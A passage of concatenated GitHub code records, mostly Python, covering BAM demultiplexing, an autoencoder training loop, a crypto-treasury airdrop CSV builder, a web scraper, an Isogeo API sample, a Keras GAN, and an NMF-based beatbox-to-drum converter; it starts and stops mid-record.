\"a\")\n opened_sam_queue.append(barcode)\n\n bam_fp = opened_sam[barcode]\n bam_fp.write(read.to_string()+'\\n')\n\n for fp in opened_sam.values():\n fp.close()\n for out_sam in os.listdir(outdir):\n pysam.sort(\"-o\", os.path.join(outdir,out_sam.replace(\"sam\",\"bam\")), os.path.join(outdir,out_sam))\n os.system(\"rm \" + os.path.join(outdir,out_sam))","repo_name":"WanluLiuLab/Benchmarking_TCR_Reconstruction","sub_path":"Split_data_code/demultiplex_bam.py","file_name":"demultiplex_bam.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15800929225","text":"import os\nimport time\nimport datetime\nfrom tqdm import tqdm\nimport torch\nimport torchinfo\nimport numpy as np\nimport multiprocessing\nimport pytorch_lightning as pl \nfrom pytorch_lightning import loggers as pl_loggers\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom argparse import ArgumentParser\nfrom model import AutoEncoder\nfrom autoencoder_datamodule import AutoEncoderDataModule\nfrom utils_pt import unnormalize, emd\n\n# get date and time to save model\ndt = datetime.datetime.today()\nyear = dt.year\nmonth = dt.month\nday = dt.day\nhour = dt.hour\nminute = dt.minute\nsecond = dt.second\n\nexperiment_name = f\"{month}.{day}.{year}-{hour}.{minute}.{second}\"\n\ndef test_model(model, test_loader):\n \"\"\"\n Our own testing loop instead of using the trainer.test() method so that we\n can multithread EMD computation on the CPU\n \"\"\"\n model.eval()\n input_calQ_list = []\n output_calQ_list = []\n with torch.no_grad():\n for x in tqdm(test_loader):\n x = x.to(model.device)\n output = model(x)\n input_calQ = model.map_to_calq(x)\n output_calQ_fr = model.map_to_calq(output)\n input_calQ = torch.stack(\n [input_calQ[i] * model.val_sum[i] for i in range(len(input_calQ))]\n ) # shape = (batch_size, 48)\n output_calQ = unnormalize(\n torch.clone(output_calQ_fr), model.val_sum\n ) # ae_out\n input_calQ_list.append(input_calQ)\n output_calQ_list.append(output_calQ)\n input_calQ = np.concatenate([i_calQ.cpu() for i_calQ in input_calQ_list], axis=0)\n output_calQ = np.concatenate([o_calQ.cpu() for o_calQ in output_calQ_list], axis=0)\n start_time = time.time()\n with multiprocessing.Pool() as pool:\n emd_list = pool.starmap(emd, zip(input_calQ, output_calQ))\n print(f\"EMD computation time: {time.time() - start_time} seconds\")\n average_emd = np.mean(np.array(emd_list))\n print(f\"Average EMD: {average_emd}\")\n return average_emd\n\n\ndef main(args):\n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n # ------------------------\n # 0 PREPARE DATA\n # ------------------------\n data_module = AutoEncoderDataModule.from_argparse_args(args)\n data_module.train_bs = 32 # I DON'T LIKE TOO HARDCODED\n data_module.test_bs = 32 # I DON'T LIKE TOO HARDCODED\n if args.process_data:\n print(\"Processing data...\")\n data_module.process_data()\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = AutoEncoder(\n accelerator=args.accelerator, \n quantize=args.quantize,\n precision=[\n 32, \n 32, \n 32\n ],\n learning_rate=1e-3, # I DON'T LIKE TOO HARDCODED\n econ_type=\"baseline\", # I DON'T LIKE TOO HARDCODED\n )\n\n torchinfo.summary(model, input_size=(1, 1, 8, 8)) # (B, C, H, W)\n\n tb_logger = pl_loggers.TensorBoardLogger(args.save_dir, name=experiment_name)\n\n # Stop training when model converges\n early_stop_callback = EarlyStopping(monitor=\"val_loss\", min_delta=0.00, patience=5, verbose=True, mode=\"min\")\n\n # Save top-1 checkpoints based on Val/Loss\n top1_checkpoint_callback = ModelCheckpoint(\n save_top_k=1,\n save_last=True,\n monitor=\"val_loss\",\n mode=\"min\",\n dirpath=os.path.join(args.save_dir, experiment_name),\n filename='model_best',\n auto_insert_metric_name=False,\n )\n print(f'Saving to dir: {os.path.join(args.save_dir, args.experiment_name)}')\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = pl.Trainer(\n max_epochs=args.max_epochs,\n accelerator=\"auto\",\n logger=tb_logger,\n callbacks=[top1_checkpoint_callback, early_stop_callback],\n )\n\n # ------------------------\n # 3 TRAIN MODEL\n # ------------------------\n if args.train:\n trainer.fit(model=model, datamodule=data_module)\n\n # ------------------------\n # 4 EVALUTE MODEL\n # ------------------------\n if args.train or args.evaluate:\n if args.checkpoint or True:\n checkpoint_file = os.path.join(args.saving_folder, args.experiment_name, f'model_best.ckpt')\n print('Loading checkpoint...', checkpoint_file)\n checkpoint = torch.load(checkpoint_file)\n model.load_state_dict(checkpoint['state_dict'])\n # Need val_sum to compute EMD\n _, val_sum = data_module.get_val_max_and_sum()\n model.set_val_sum(val_sum)\n data_module.setup(\"test\")\n test_results = test_model(model, data_module.test_dataloader())\n test_results_log = os.path.join(\n args.saving_folder, args.experiment_name, args.experiment_name + f\"_emd.txt\"\n )\n with open(test_results_log, \"w\") as f:\n f.write(str(test_results))\n f.close()\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"--process_data\", action=\"store_true\", default=False)\n parser.add_argument(\"--max_epochs\", type=int, default=10)\n parser.add_argument(\"--save_dir\", type=str, default=\"/data/jcampos/hawq-jet-tagging/checkpoints/econ\")\n parser.add_argument(\"--experiment_name\", type=str, default=\"autoencoder\")\n parser.add_argument(\"--fast_dev_run\", action=\"store_true\", default=False)\n parser.add_argument(\n \"--accelerator\", type=str, choices=[\"cpu\", \"gpu\", \"auto\"], default=\"auto\"\n )\n parser.add_argument(\"--checkpoint\", type=str, default=\"\", help=\"model checkpoint\")\n parser.add_argument(\"--train\", action=\"store_true\", default=False)\n parser.add_argument(\"--evaluate\", action=\"store_true\", default=False)\n parser.add_argument(\n \"--quantize\", \n action=\"store_true\", \n default=False, \n help=\"quantize model to 6-bit fixed point (1 signed bit, 1 integer bit, 4 fractional bits)\"\n )\n\n # Add dataset-specific args\n parser = AutoEncoderDataModule.add_argparse_args(parser)\n\n args = parser.parse_args()\n main(args)\n","repo_name":"fastmachinelearning/hawq-jet-tagging","sub_path":"training/econ/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"17367937531","text":"import pandas as pd\nfrom brownie import interface\nfrom decimal import Decimal\n\nfrom helpers.addresses import registry\n\n\ndef main():\n \"\"\"\n build a gnosis airdrop csv with all topups needing to happen for a given\n week.\n \"\"\"\n\n df = {\"token_address\": [], \"receiver\": [], \"value\": []}\n\n # https://github.com/Badger-Finance/badger-multisig/issues/293\n # add badger to the tree for weekly emissions\n week_12_badger_emissions = Decimal(\"23994.02\")\n week_12_rembadger_emissions = Decimal(\"7692.307692\")\n df[\"token_address\"].append(registry.eth.treasury_tokens.BADGER)\n df[\"receiver\"].append(registry.eth.badger_wallets.badgertree)\n df[\"value\"].append(week_12_badger_emissions + week_12_rembadger_emissions)\n\n # https://github.com/Badger-Finance/badger-multisig/issues/294\n # add badger to the tree for weekly emissions\n week_12_digg_emissions = Decimal(\"1.302461219\")\n df[\"token_address\"].append(registry.eth.treasury_tokens.DIGG)\n df[\"receiver\"].append(registry.eth.badger_wallets.badgertree)\n df[\"value\"].append(week_12_digg_emissions)\n\n # https://github.com/Badger-Finance/badger-multisig/issues/302\n # move bvecvx and related positions to treasury voter\n bvecvx_bal = interface.ISettV4h(\n registry.eth.treasury_tokens.bveCVX,\n owner=registry.eth.badger_wallets.treasury_ops_multisig,\n ).balanceOf(registry.eth.badger_wallets.treasury_ops_multisig)\n df[\"token_address\"].append(registry.eth.treasury_tokens.bveCVX)\n df[\"receiver\"].append(registry.eth.badger_wallets.treasury_voter_multisig)\n df[\"value\"].append(Decimal(bvecvx_bal) / Decimal(\"1e18\"))\n\n # turn dict of lists into dataframe and add additional columns needed by\n # the gnosis app\n df = pd.DataFrame(df)\n df[\"token_type\"] = \"erc20\"\n df[\"id\"] = pd.NA\n\n # build dataframe for airdrop and dump to csv\n airdrop = df[[\"token_type\", \"token_address\", \"receiver\", \"value\", \"id\"]]\n airdrop.to_csv(\n \"scripts/badger/topups/week_12.csv\",\n index=False,\n header=[\"token_type\", \"token_address\", \"receiver\", \"value\", \"id\"],\n )\n print(airdrop)\n","repo_name":"Badger-Finance/badger-multisig","sub_path":"scripts/badger/topups/week_12.py","file_name":"week_12.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"44"} +{"seq_id":"38453908725","text":"import os\nimport json\nimport requests\n\ndef get_total_page(url, path, file_name):\n print('getting total page...')\n\n json_res = requests.get(url).json()\n\n with open(os.path.join(path, file_name), 'w+') as outfile:\n json.dump(json_res, outfile)\n\n with open(os.path.join(path, file_name)) as json_file:\n json_data = json.load(json_file)\n\n total_page = json_data['total_pages']\n\n print('Done getting total page...')\n\n return total_page\n\n\ndef get_urls(url, page):\n print('getting urls... page {}'.format(page))\n\n json_res = requests.get(url).json()\n\n urls = []\n for item in json_res['items']:\n urls.append(item['link'])\n\n print('Done getting urls... page {}'.format(page))\n\n return urls","repo_name":"w4ndry/scraping-teralogistics","sub_path":"modules/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33438570677","text":"\n# #ფუნქციის გრაფიკი y=2\n# def route(x,y):\n# if y == 2:\n# return True\n# else:\n# return False\n \n# x = int(input(\"enter the x coordinate: \"))\n# y = int(input(\"enter the y coordinate: \"))\n\n# print(route(x, y))\n\ndef divide(arr):\n my_sum = 0\n for element in arr:\n my_sum += element\n \n return my_sum/len(arr)\n\narr = []\nammount_of_numbers = int(input(\"შეიყვანეთ რამდენი რიცხვის შეყვანა გსურთ: \"))\nfor i in range(ammount_of_numbers):\n num = int(input(\"enter num\" + str(i+1) + \":\"))\n arr.append(num)\n \nprint(divide(arr))\n\n \n\n\n\n","repo_name":"Tsertsvadze/IT-step","sub_path":"day-5/davaleba1.py","file_name":"davaleba1.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74222406852","text":"import pyaudio\nimport librosa, librosa.display\nimport numpy as np\nimport scipy\nimport sounddevice as sd\nfrom playsound import playsound\nimport time\nfrom NMF_Function import myNMF\n\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n# constants\nCHUNK = 256 # samples per frame\nFORMAT = pyaudio.paFloat32 # audio format (bytes per sample?)\nCHANNELS = 1 # single channel for microphone\nRATE = 44100 # samples per second\nRECORD_SEC = 2\n\n# pyaudio class instance\np = pyaudio.PyAudio()\n\n# initialize stream object\nstream = p.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n)\n\n## KICK\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Kick')\n input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * RECORD_SEC)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n \n playsound('record_end.wav')\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n kick = np.hstack(frames)\n \n print('Playing back...')\n time.sleep(1)\n sd.play(kick, RATE)\n time.sleep(RECORD_SEC)\n sd.stop()\n\n \n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Kick recorded!')\n print('Press Enter to move onto Snare')\n print('~~~~~~~~~~~~~~~~~~~~')\n input()\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\n\n## SNARE\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Snare')\n input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * RECORD_SEC)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n \n\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n snare = np.hstack(frames)\n playsound('record_end.wav')\n print('Playing back...')\n time.sleep(1)\n sd.play(snare, RATE)\n time.sleep(RECORD_SEC)\n sd.stop()\n\n \n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Snare recorded!')\n print('Press Enter to move onto Hihat')\n print('~~~~~~~~~~~~~~~~~~~~')\n\n input()\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\n\n\n## HIHAT\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Hihat')\n input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * RECORD_SEC)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n hihat = np.hstack(frames)\n playsound('record_end.wav')\n print('Playing back...')\n time.sleep(1)\n sd.play(hihat, RATE)\n time.sleep(RECORD_SEC)\n sd.stop()\n\n \n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Hihat recorded!')\n print('Press Enter to complete recording')\n print('~~~~~~~~~~~~~~~~~~~~')\n input()\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\nprint('Recording Samples')\n\nframes = [] # A python-list of chunks(numpy.ndarray)\nwhile True:\n\n print('~~~~~~~~~~~~~~~~~~~~')\n print('Press Enter to begin recording Beatboxing')\n input()\n\n \n time.sleep(.5)\n\n for _ in range(0, int(RATE / CHUNK * 10)):\n data = stream.read(CHUNK, exception_on_overflow = False)\n frames.append(np.fromstring(data, dtype=np.float32))\n\n \n playsound('record_end.wav')\n #Convert the list of numpy-arrays into a 1D array (column-wise)\n recording = np.hstack(frames)\n \n print('Playing back...')\n time.sleep(1)\n sd.play(recording, RATE)\n time.sleep(10)\n sd.stop()\n\n \n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n print('\\n')\n print('Beatboxing recorded!')\n \n break\n else:\n frames = []\n print('\\n\\n')\n continue\n\n# close stream\nstream.stop_stream()\nstream.close()\n\np.terminate()\n\n\n# STFT Parameters\nfftlen = 1024\nhopsize = 256\n\n# Training the dictionary components\nprint(\"Training Dictionary\")\n\nW = np.zeros((513,3)) # Dictionary Matrix\n\n# Calculate the spectrogram\nS = librosa.stft(kick,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 1\nnIter = 75\n\n[W_temp,H,KL] = myNMF(S_mag,r,nIter) # Process the Dictionary Matrix\nW[:,0] = W_temp[:,0]\n\nprint(f'Component 0 Trained')\n\n\n# Calculate the spectrogram\nS = librosa.stft(snare,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 1\nnIter = 75\n\n[W_temp,H,KL] = myNMF(S_mag,r,nIter) # Process the Dictionary Matrix\nW[:,1] = W_temp[:,0]\n\nprint(f'Component 1 Trained')\n\n\n# Calculate the spectrogram\nS = librosa.stft(hihat,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 1\nnIter = 75\n\n[W_temp,H,KL] = myNMF(S_mag,r,nIter) # Process the Dictionary Matrix\nW[:,2] = W_temp[:,0]\n\nprint(f'Component 2 Trained')\n\n\n\n# Loading in Test Audio File\nx = recording\n\n# Calculating the spectrogram of the audio file\nS = librosa.stft(x,hop_length=hopsize,win_length=fftlen, window='hamming', n_fft=fftlen)\nS_mag, S_phase = librosa.magphase(S)\nS_db = librosa.amplitude_to_db(S_mag)\n\n# NMF Parameters\nr = 3\nnIter = 75\n\n[_,H,KL] = myNMF(S_mag,r,nIter,bUpdateW=0,initW=W) # Processing the audio file\nprint(\"NMF Completed\")\n\n\nnumframes = np.floor(x.size/hopsize).astype(int) # calculating the number of total frames\n\nlocalmax = np.zeros((3,100), dtype= int) # Variable for the local maxima of each component's activation matrix\n\nfor n in range(r):\n\n H[n,:] *= 1.0 / (H[n,:].max()) # Normalization\n\n maxima, _ = scipy.signal.find_peaks(H[n,:], height=0.2, distance=18) # Finding local maxima\n localmax[n, 0:len(maxima)] = maxima\n \n# Organizing and sorting local maxima into one array\nmaximas = np.concatenate([localmax[0],localmax[1],localmax[2]])\nmaximas = maximas[maximas != 0]\nmaximas = np.sort(maximas)\n\n# Detecting and processing duplicate or false maxima detection\nfor i in range(0,len(maximas)-1):\n\n # If any successive maxima are within a certain distance\n if(maximas[i+1] <= maximas[i] + 10): \n try:\n idx1 = np.where(localmax == maximas[i])[0][0]\n except:\n\n idx1 = 0\n try:\n idx2 = np.where(localmax == maximas[i+1])[0][0]\n except:\n idx2 = 0\n \n\n # Check which maxima has a higher magnitude and delete the other false maxima\n if(H[idx1,maximas[i]] > H[idx2,maximas[i+1]]):\n localmax[idx2, np.where(localmax[idx2] == maximas[i+1])[0]] = 0\n else:\n localmax[idx1,np.where(localmax[idx1] == maximas[i])[0]] = 0\n\n\n\n# Arrays for finding final triggers\ntriggers = np.zeros((3,numframes),dtype=int)\ntemps = np.zeros((3,100), dtype= int) \n\nfor n in range(r):\n\n max = localmax[n][localmax[n] != 0] # Find all maxima not equal to 0\n temps[n, 0:len(max)] = max # Load into temp array\n\n for i in range(numframes): # Set impulse at maxima location\n if(i in max):\n triggers[n,i] = 1\n\n\nsnare, _ = librosa.load(\"Fakie Flip Snare.wav\", sr=None) # Loading in audio file\nkick, _ = librosa.load(\"Nollie Kick.wav\", sr=None) # Loading in audio file\nhihat, _ = librosa.load(\"Heel Flip Hat.wav\", sr=None) # Loading in audio file\n\n\n\ntriggers_interp = np.zeros((3,len(triggers[0]) + (len(triggers[0])-1)*(255))) # Reconstructing the output through interpolation\nfor n in range(3):\n triggers_interp[n][::256] = triggers[n]\n\nout = np.zeros(len(triggers_interp[0]) + RATE * RECORD_SEC) # Output with a buffer at the end for audio recording\n\n# Check for trigger and load corresponding audio sample\nfor samp in range(len(triggers_interp[0])):\n if(triggers_interp[1,samp] == 1):\n out[samp:len(snare)+samp] = snare\n elif(triggers_interp[0,samp] == 1):\n out[samp:len(kick)+samp] = kick\n elif(triggers_interp[2,samp] == 1):\n out[samp:len(hihat)+samp] = hihat\n\nif(x.size < out.size): # Match lengths of audio signals\n out = out[0:len(x)]\n\nprint(\"Playing Audio\")\n\nwhile True: # Play output \n \n sd.play(out+x, RATE)\n time.sleep(len(out)/RATE)\n sd.stop()\n\n check = input(\"Is this good? (Y/N)\")\n if check == 'Y':\n input()\n break","repo_name":"nmill15/ECE_477_FinalProject","sub_path":"477Final.py","file_name":"477Final.py","file_ext":"py","file_size_in_byte":9016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15441214449","text":"# -*- coding: UTF-8 -*-\n#! python3 # noqa E265\n\n\"\"\"\n Isogeo sample - Check if OpenCatalog exists in shares, then build a matching table between metadata and opencatalog URL\n\n To use it from the repository root:\n\n `python ./isogeo_pysdk/samples/get_OpenCatalog.py`\n\"\"\"\n\n# ##############################################################################\n# ########## Libraries #############\n# ##################################\n\n# standard\nimport logging\n\n# Isogeo\nfrom isogeo_pysdk import Isogeo, Share\n\n# ##############################################################################\n# ##### Stand alone program ########\n# ##################################\nif __name__ == \"__main__\":\n \"\"\"Standalone execution.\"\"\"\n # standard\n from os import environ\n\n # 3rd party\n from dotenv import load_dotenv\n import urllib3\n\n logger = logging.getLogger()\n log_console_handler = logging.StreamHandler()\n log_console_handler.setLevel(logging.DEBUG)\n logger.addHandler(log_console_handler)\n\n # get user ID as environment variables\n load_dotenv(\"prod.env\")\n\n # ignore warnings related to the QA self-signed cert\n if environ.get(\"ISOGEO_PLATFORM\").lower() == \"qa\":\n urllib3.disable_warnings()\n\n # for oAuth2 Backend (Client Credentials Grant) Flow\n isogeo = Isogeo(\n auth_mode=\"group\",\n client_id=environ.get(\"ISOGEO_API_GROUP_CLIENT_ID\"),\n client_secret=environ.get(\"ISOGEO_API_GROUP_CLIENT_SECRET\"),\n auto_refresh_url=\"{}/oauth/token\".format(environ.get(\"ISOGEO_ID_URL\")),\n platform=environ.get(\"ISOGEO_PLATFORM\", \"qa\"),\n )\n\n # getting a token\n isogeo.connect()\n\n # Check OpenCatalog URLS\n print(\n \"This application is authenticated as {} and supplied by {} shares.\".format(\n isogeo.app_properties.name, len(isogeo._shares)\n )\n )\n\n for s in isogeo._shares:\n share = Share(**s)\n print(\n \"\\nShare {} owned by {}\".format(\n share.name, share._creator.get(\"contact\").get(\"name\")\n )\n )\n\n # OpenCatalog status\n opencatalog_url = share.opencatalog_url(isogeo.oc_url)\n if isogeo.head(opencatalog_url):\n print(\"OpenCatalog available at: {}\".format(opencatalog_url))\n else:\n print(\n \"OpenCatalog not enabled yet. Go to the administration to add it: {}\".format(\n share.admin_url(isogeo.app_url)\n )\n )\n\n # get metadata present into the share\n share_mds = isogeo.search(whole_results=1, share=share._id)\n print(\"{} metadata are available through this share.\".format(share_mds.total))\n\n # closing the connection\n isogeo.close()\n","repo_name":"isogeo/isogeo-api-py-minsdk","sub_path":"isogeo_pysdk/samples/get_OpenCatalog.py","file_name":"get_OpenCatalog.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"15902051623","text":"import toolkit\nfrom pandas import HDFStore\nimport suite\n\nc1 = suite.Combo1()\nc1.date_selector = toolkit.DateSelector('2018-01-02', '2018-05-10')\n\nboot = toolkit.Bootup()\nhdf = HDFStore(boot.data_read_only_file)\ndf = hdf['ADSK']\nprint(df.shape)\n\ntoolkit.add_analysis_data(df)\n\nfor i, row in df.iterrows():\n print(i)\n print(c1.query(i, row))\n","repo_name":"GaryBian/rs","sub_path":"src/selectortest2.py","file_name":"selectortest2.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36276143905","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[32]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom keras.datasets import mnist\nfrom keras.layers import Dense, Flatten, Reshape\nfrom keras.layers.advanced_activations import LeakyReLU\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\n\n\n# In[33]:\n\n\nimg_rows = 28\nimg_cols = 28\nchannels = 1\n\n# 入力画像の次元\nimg_shape = (img_rows, img_cols, channels)\n\n# 生成器の入力として使われるノイズベクトルの次元\nz_dim = 100\n\n\n# ## 生成器のモデル\n\n# In[34]:\n\n\ndef build_generator(img_shape, z_dim):\n \n model = Sequential()\n \n # 全結合層\n model.add(Dense(128, input_dim=z_dim))\n \n # Leaky ReLUによる活性化\n model.add(LeakyReLU(alpha=0.01))\n \n # tanh関数による出力層\n model.add(Dense(28 * 28 * 1, activation='tanh'))\n \n # 生成器の出力が画像サイズになるようにreshapeする\n model.add(Reshape(img_shape))\n \n return model\n\n\n# ## 識別器のモデル\n\n# In[35]:\n\n\ndef build_discriminator(img_shape):\n \n model = Sequential()\n \n # 入力画像を一列に並べる\n model.add(Flatten(input_shape=img_shape))\n \n # 全結合層\n model.add(Dense(128))\n \n # Leaky ReLUによる活性化\n model.add(LeakyReLU(alpha=0.01))\n \n # sigmoid関数を通して出力する\n model.add(Dense(1, activation='sigmoid'))\n \n return model\n\n\n# ## GANの構築とコンパイル\n\n# In[38]:\n\n\ndef build_gan(generator, discriminator):\n \n model = Sequential()\n \n # 生成器と識別器の結合\n model.add(generator)\n model.add(discriminator)\n \n return model\n# 識別器の構築とコンパイル\ndiscriminator = build_discriminator(img_shape)\n\n# 生成器の構築中は識別器のパラメータを固定\ndiscriminator.compile(loss='binary_crossentropy',\n optimizer=Adam(),\n metrics=['accuracy'])\n\n# 生成器の構築\ngenerator = build_generator(img_shape, z_dim)\n\n# 生成器の構築中は識別器のパラメータを固定する\ndiscriminator.tranable = False\n\n# 生成器の訓練のため、識別器は固定し、GANモデルの構築とコンパイルを行う\ngan = build_gan(generator, discriminator)\ngan.compile(loss='binary_crossentropy', optimizer=Adam())\n\n\n# ## GANの訓練ループ\n\n# In[39]:\n\n\n## GANの訓練ループ\nlosses = []\naccuracies = []\niteration_checkpoints = []\n\ndef train(iterations, batch_size, sample_interval):\n \n # MNISTデータセットのロード\n (X_train, _), (_, _) = mnist.load_data()\n \n # [0,255]の範囲のグレースケールがそちを[-1, 1]にスケーリング\n X_train = X_train / 127.5 - 1.0\n X_train = np.expand_dims(X_train, axis=3)\n \n # 本物の画像のラベルは全て1とする\n real = np.ones((batch_size, 1))\n \n # 偽の画像のラベルは全て0とする\n fake = np.zeros((batch_size, 1))\n \n for iteration in range(iterations):\n \n # -------------------\n # 識別器の訓練\n # -------------------\n \n # 本物の画像のランダムに取り出したバッチを作る\n idx = np.random.randint(0, X_train.shape[0], batch_size)\n imgs = X_train[idx]\n \n #偽の画像のランダムに取り出したバッチを生成する\n z = np.random.normal(0, 1, (batch_size, 100))\n gen_imgs = generator.predict(z)\n \n # 識別器の訓練\n d_loss_real = discriminator.train_on_batch(imgs, real)\n d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)\n d_loss, accuracy = 0.5 * np.add(d_loss_real, d_loss_fake)\n \n # -----------------\n # 生成器の訓練\n # -----------------\n \n # 偽の画像のバッチを生成する\n z = np.random.normal(0, 1, (batch_size, 100))\n gen_imgs = generator.predict(z)\n \n # 生成器の訓練\n g_loss = gan.train_on_batch(z, real)\n \n if (iteration + 1) % sample_interval == 0:\n \n # 訓練終了後に図時するために、損失を精度をセーブしておく\n losses.append((d_loss, g_loss))\n accuracies.append(100.0 * accuracy)\n iteration_checkpoints.append(iteration + 1)\n \n # 訓練の進捗を出力する\n print(\"%d [D loss: %f, acc.: %.2f%%] [G loss: %f]\" %\n (iteration + 1, d_loss, 100.0 * accuracy, g_loss))\n \n # 生成された画像のサンプルを出力する\n sample_images(generator)\n\n\n# ## 生成された画像の表示\n\n# In[44]:\n\n\ndef sample_images(generator, image_grid_rows=4, image_grid_columns=4):\n\n # Sample random noise\n z = np.random.normal(0, 1, (image_grid_rows * image_grid_columns, z_dim))\n\n # Generate images from random noise\n gen_imgs = generator.predict(z)\n\n # Rescale image pixel values to [0, 1]\n gen_imgs = 0.5 * gen_imgs + 0.5\n\n # Set image grid\n fig, axs = plt.subplots(image_grid_rows,\n image_grid_columns,\n figsize=(4, 4),\n sharey=True,\n sharex=True)\n\n cnt = 0\n for i in range(image_grid_rows):\n for j in range(image_grid_columns):\n # Output a grid of images\n axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap='gray')\n axs[i, j].axis('off')\n cnt += 1\n\n\n# ## モデルを実行する\n\n# In[45]:\n\n\n# ハイパーパラメータの設定\niterations = 20000\nbatch_size = 128\nsample_interval = 1000\n\n# 設定した反復回数だけGANの訓練を行う\ntrain(iterations, batch_size, sample_interval)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"takerumimata/GANGAN-gashuku","sub_path":"gangan.py","file_name":"gangan.py","file_ext":"py","file_size_in_byte":5857,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"38511870239","text":"from typing import Callable, Text, Tuple\r\n\r\nimport pandas as pd\r\nfrom numpy import nanmean\r\nfrom scipy.stats import bootstrap, sem, t\r\n\r\n\r\ndef calculate_t_ci(\r\n function_to_ci: Callable,\r\n data_to_ci: pd.Series,\r\n ci_level: float\r\n):\r\n \"\"\"\r\n Used to calculate the t distribution based\r\n confidence interval.\r\n It's called in confidence_interval_calculation function.\r\n Args:\r\n function_to_ci: Callable\r\n data_to_ci: pd.Series\r\n ci_level: float\r\n\r\n Returns:\r\n low_ci: float\r\n high_ci: float\r\n\r\n \"\"\"\r\n\r\n data_to_ci = data_to_ci.to_list()\r\n parameter_to_ci = function_to_ci(data_to_ci)\r\n standard_error = sem(data_to_ci, nan_policy=\"omit\")\r\n ci = standard_error * t.ppf((1 + ci_level) / 2., len(data_to_ci) - 1)\r\n low_ci = parameter_to_ci - ci\r\n\r\n high_ci = parameter_to_ci + ci\r\n return low_ci, high_ci\r\n\r\n\r\ndef confidence_interval_calculation(\r\n to_ci: pd.DataFrame,\r\n stage_device_name: Text,\r\n function_to_ci: Callable = nanmean,\r\n return_annot_df: bool = False,\r\n ci_level: float = 0.95,\r\n digit: int = 2,\r\n ci_bootstrapping: bool = False,\r\n boot_method: Text = \"basic\",\r\n boot_n_resamples: int = 100000\r\n) -> Tuple:\r\n\r\n \"\"\"\r\n Calculates the confidence interval (ci for short).\r\n It allows to calculate the ci in different\r\n methods.\r\n\r\n Args:\r\n to_ci: pd.DataFrame\r\n Dataframe to confidence interval\r\n stage_device_name: Text\r\n Stage or device on which data the ci is calculated.\r\n Argument named after the fact that in bland-altman functions,\r\n the CI is calculated on single device, while in performance\r\n metrics the function is applied to every single sleep stage.\r\n function_to_ci: Callable\r\n callable of moment.\r\n The default is nanmean.\r\n return_annot_df: bool\r\n if true, the function returns a 